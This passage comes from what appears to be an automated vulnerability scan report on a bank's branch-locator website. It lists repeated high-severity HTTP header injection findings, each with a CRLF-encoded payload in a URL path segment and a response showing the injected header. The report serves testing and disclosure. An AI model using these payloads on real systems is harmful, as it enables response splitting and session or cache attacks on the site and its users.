User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:49 GMT
Server: Apache
Set-Cookie: JSESSIONID=B2C57495B91395E7394BFB98CBA060E9.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/103__E__23rd__St_10010_NEW__YORK_NY/bank_branch_locations/3c1fd
e44b71fce6c=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.11. http://locators.bankofamerica.com/locator/locator/1051__Route__37__West_08755_TOMS__RIVER_NJ/bank_branch_locations/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/1051__Route__37__West_08755_TOMS__RIVER_NJ/bank_branch_locations/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 6f1f4%0d%0af12cbba1b4b was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/6f1f4%0d%0af12cbba1b4b/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:21:34 GMT
Server: Apache
Set-Cookie: JSESSIONID=064B9067FE74C079DB2904A4B7F50C11.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/6f1f4
f12cbba1b4b/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.12. http://locators.bankofamerica.com/locator/locator/1051__Route__37__West_08755_TOMS__RIVER_NJ/bank_branch_locations/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/1051__Route__37__West_08755_TOMS__RIVER_NJ/bank_branch_locations/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 65204%0d%0aa09325ae92 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/1051__Route__37__West_08755_TOMS__RIVER_NJ/65204%0d%0aa09325ae92/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:39 GMT
Server: Apache
Set-Cookie: JSESSIONID=28170333A526780A00E5732ED6EEE0E1.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/1051__Route__37__West_08755_TOMS__RIVER_NJ/65204
a09325ae92/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.13. http://locators.bankofamerica.com/locator/locator/1051__Route__37__West_08755_TOMS__RIVER_NJ/bank_branch_locations/action=route [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/1051__Route__37__West_08755_TOMS__RIVER_NJ/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload d5c6d%0d%0aa4d84d12b6b was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/d5c6d%0d%0aa4d84d12b6b/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:01 GMT
Server: Apache
Set-Cookie: JSESSIONID=291CDF2A7BAC9F6491383E6A13B857CB.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/d5c6d
a4d84d12b6b/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.14. http://locators.bankofamerica.com/locator/locator/1051__Route__37__West_08755_TOMS__RIVER_NJ/bank_branch_locations/action=route [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/1051__Route__37__West_08755_TOMS__RIVER_NJ/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload adcb2%0d%0aeb659c486f5 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/1051__Route__37__West_08755_TOMS__RIVER_NJ/adcb2%0d%0aeb659c486f5/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:32 GMT
Server: Apache
Set-Cookie: JSESSIONID=3A1E96F478E6638CDE6AC6949D6569FA.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/1051__Route__37__West_08755_TOMS__RIVER_NJ/adcb2
eb659c486f5/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.15. http://locators.bankofamerica.com/locator/locator/1051__Route__37__West_08755_TOMS__RIVER_NJ/bank_branch_locations/action=route [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/1051__Route__37__West_08755_TOMS__RIVER_NJ/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload da8ba%0d%0acc45498d226 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/1051__Route__37__West_08755_TOMS__RIVER_NJ/bank_branch_locations/da8ba%0d%0acc45498d226=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:52 GMT
Server: Apache
Set-Cookie: JSESSIONID=8BDFE3FFB21CC5FFB8727BFF16FA6DC3.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/1051__Route__37__West_08755_TOMS__RIVER_NJ/bank_branch_locations/da8ba
cc45498d226=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.16. http://locators.bankofamerica.com/locator/locator/105__East__9th_67337_COFFEYVILLE_KS/bank_branch_locations/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/105__East__9th_67337_COFFEYVILLE_KS/bank_branch_locations/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 1acd4%0d%0a703108ec87f was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/1acd4%0d%0a703108ec87f/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:47 GMT
Server: Apache
Set-Cookie: JSESSIONID=CD67453217077088FCC2DBDD3517D702.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/1acd4
703108ec87f/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.17. http://locators.bankofamerica.com/locator/locator/105__East__9th_67337_COFFEYVILLE_KS/bank_branch_locations/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/105__East__9th_67337_COFFEYVILLE_KS/bank_branch_locations/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 39089%0d%0a3b9ccd8860a was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/105__East__9th_67337_COFFEYVILLE_KS/39089%0d%0a3b9ccd8860a/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:47 GMT
Server: Apache
Set-Cookie: JSESSIONID=2F7013D7431966A8A56221F30F3009CB.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/105__East__9th_67337_COFFEYVILLE_KS/39089
3b9ccd8860a/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.18. http://locators.bankofamerica.com/locator/locator/105__East__9th_67337_COFFEYVILLE_KS/bank_branch_locations/action=route [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/105__East__9th_67337_COFFEYVILLE_KS/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 5fc5d%0d%0a25c6b4c148e was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/5fc5d%0d%0a25c6b4c148e/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:53 GMT
Server: Apache
Set-Cookie: JSESSIONID=90135C61F0142C35A0033C4D583CDC99.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/5fc5d
25c6b4c148e/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.19. http://locators.bankofamerica.com/locator/locator/105__East__9th_67337_COFFEYVILLE_KS/bank_branch_locations/action=route [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/105__East__9th_67337_COFFEYVILLE_KS/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload d54c7%0d%0aa206af74154 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/105__East__9th_67337_COFFEYVILLE_KS/d54c7%0d%0aa206af74154/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:15 GMT
Server: Apache
Set-Cookie: JSESSIONID=1B5742CAF397A35F85864757CAACB775.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/105__East__9th_67337_COFFEYVILLE_KS/d54c7
a206af74154/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.20. http://locators.bankofamerica.com/locator/locator/105__East__9th_67337_COFFEYVILLE_KS/bank_branch_locations/action=route [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/105__East__9th_67337_COFFEYVILLE_KS/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload d6685%0d%0a413162d086a was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/105__East__9th_67337_COFFEYVILLE_KS/bank_branch_locations/d6685%0d%0a413162d086a=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:53 GMT
Server: Apache
Set-Cookie: JSESSIONID=E4C59495B0BA54C000271B2B85E487A8.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/105__East__9th_67337_COFFEYVILLE_KS/bank_branch_locations/d6685
413162d086a=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.21. http://locators.bankofamerica.com/locator/locator/108__South__McGee_67333_CANEY_KS/bank_branch_locations/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/108__South__McGee_67333_CANEY_KS/bank_branch_locations/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload b048c%0d%0a86918b2fad5 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/b048c%0d%0a86918b2fad5/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:22 GMT
Server: Apache
Set-Cookie: JSESSIONID=1E600614B66759926F2FE2AB26A6744F.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/b048c
86918b2fad5/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.22. http://locators.bankofamerica.com/locator/locator/108__South__McGee_67333_CANEY_KS/bank_branch_locations/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/108__South__McGee_67333_CANEY_KS/bank_branch_locations/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 47aab%0d%0a312f39a2258 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/108__South__McGee_67333_CANEY_KS/47aab%0d%0a312f39a2258/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:23 GMT
Server: Apache
Set-Cookie: JSESSIONID=E5EB3AEB63875D6A701E51F651D8C8E2.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/108__South__McGee_67333_CANEY_KS/47aab
312f39a2258/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.23. http://locators.bankofamerica.com/locator/locator/108__South__McGee_67333_CANEY_KS/bank_branch_locations/action=route [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/108__South__McGee_67333_CANEY_KS/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload b0889%0d%0a28d57f1cafb was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/b0889%0d%0a28d57f1cafb/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:28 GMT
Server: Apache
Set-Cookie: JSESSIONID=5EFE47D680A66C0C80CB649406CB880F.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/b0889
28d57f1cafb/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.24. http://locators.bankofamerica.com/locator/locator/108__South__McGee_67333_CANEY_KS/bank_branch_locations/action=route [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/108__South__McGee_67333_CANEY_KS/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 16091%0d%0a5ad13bce327 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/108__South__McGee_67333_CANEY_KS/16091%0d%0a5ad13bce327/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:28 GMT
Server: Apache
Set-Cookie: JSESSIONID=0108BD81BD2BD5D42C4AE06F5179A52C.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/108__South__McGee_67333_CANEY_KS/16091
5ad13bce327/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.25. http://locators.bankofamerica.com/locator/locator/108__South__McGee_67333_CANEY_KS/bank_branch_locations/action=route [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/108__South__McGee_67333_CANEY_KS/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 8b66c%0d%0abcc926d25ff was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/108__South__McGee_67333_CANEY_KS/bank_branch_locations/8b66c%0d%0abcc926d25ff=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:55 GMT
Server: Apache
Set-Cookie: JSESSIONID=83D63EDF5035A9701E859F9815E67C48.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/108__South__McGee_67333_CANEY_KS/bank_branch_locations/8b66c
bcc926d25ff=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.26. http://locators.bankofamerica.com/locator/locator/10__Juliustown__Rd_08015_BROWNS__MILLS_NJ/bank_branch_locations/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/10__Juliustown__Rd_08015_BROWNS__MILLS_NJ/bank_branch_locations/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 2a223%0d%0a9fff350672c was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/2a223%0d%0a9fff350672c/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:21:38 GMT
Server: Apache
Set-Cookie: JSESSIONID=2C33A92ADCD99F835B805FBEE8CB3B13.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/2a223
9fff350672c/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.27. http://locators.bankofamerica.com/locator/locator/10__Juliustown__Rd_08015_BROWNS__MILLS_NJ/bank_branch_locations/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/10__Juliustown__Rd_08015_BROWNS__MILLS_NJ/bank_branch_locations/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload e5d35%0d%0a5c8338dbff0 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/10__Juliustown__Rd_08015_BROWNS__MILLS_NJ/e5d35%0d%0a5c8338dbff0/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:41 GMT
Server: Apache
Set-Cookie: JSESSIONID=C9FA843889123488FB5410B29E7C4A28.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/10__Juliustown__Rd_08015_BROWNS__MILLS_NJ/e5d35
5c8338dbff0/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.28. http://locators.bankofamerica.com/locator/locator/10__Juliustown__Rd_08015_BROWNS__MILLS_NJ/bank_branch_locations/action=route [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/10__Juliustown__Rd_08015_BROWNS__MILLS_NJ/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 200d0%0d%0a075e252f45f was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/200d0%0d%0a075e252f45f/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:21:45 GMT
Server: Apache
Set-Cookie: JSESSIONID=5050496A72B7414E820F8D9AA8BE3FF8.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/200d0
075e252f45f/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.29. http://locators.bankofamerica.com/locator/locator/10__Juliustown__Rd_08015_BROWNS__MILLS_NJ/bank_branch_locations/action=route [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/10__Juliustown__Rd_08015_BROWNS__MILLS_NJ/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 7aa3e%0d%0abe910f2f508 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/10__Juliustown__Rd_08015_BROWNS__MILLS_NJ/7aa3e%0d%0abe910f2f508/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:07 GMT
Server: Apache
Set-Cookie: JSESSIONID=1E808A1AC0D4581C261A573A4388F390.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/10__Juliustown__Rd_08015_BROWNS__MILLS_NJ/7aa3e
be910f2f508/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.30. http://locators.bankofamerica.com/locator/locator/10__Juliustown__Rd_08015_BROWNS__MILLS_NJ/bank_branch_locations/action=route [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/10__Juliustown__Rd_08015_BROWNS__MILLS_NJ/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload f1f8d%0d%0a993b85bdd91 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/10__Juliustown__Rd_08015_BROWNS__MILLS_NJ/bank_branch_locations/f1f8d%0d%0a993b85bdd91=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:49 GMT
Server: Apache
Set-Cookie: JSESSIONID=16B6804C3097E74D2A521F17C95D4522.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/10__Juliustown__Rd_08015_BROWNS__MILLS_NJ/bank_branch_locations/f1f8d
993b85bdd91=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.31. http://locators.bankofamerica.com/locator/locator/110__Third__Ave_10003_NEW__YORK_NY/bank_branch_locations/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/110__Third__Ave_10003_NEW__YORK_NY/bank_branch_locations/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 2660b%0d%0a2cc0e908e4b was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/2660b%0d%0a2cc0e908e4b/bank_branch_locations/ HTTP/1.1
